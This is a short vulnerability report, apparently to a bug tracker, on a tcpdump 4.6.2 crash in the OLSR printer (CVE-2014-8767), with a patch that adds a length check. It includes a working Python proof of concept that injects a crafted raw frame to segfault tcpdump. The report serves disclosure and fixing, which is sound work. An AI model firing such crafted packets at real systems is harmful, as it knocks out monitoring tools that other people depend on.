Package: tcpdump
Version: 4.6.2
tags: Security
Use following script for generate packet:
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
olsr_frame =
"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"
s.send(olsr_frame)
#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug was reported as CVE-2014-8767.
Proposed patch is in attached file. Main idea is checking the length of
available
data before print on screen.
The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
The originally report in BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90
--
CongNT
--- tcpdump-tcpdump-4.6/print-olsr.c 2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c 2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
ND_PRINT((ndo, "\n\t neighbor\n\t\t"));
neighbor = 1;
+ u_int caplength;
+
+ /* Checking length of available data before print */
+ caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+ if (hello_len > caplength)
+ hello_len = caplength;
+
while (hello_len >= sizeof(struct in_addr)) {
/* print 4 neighbors per line */
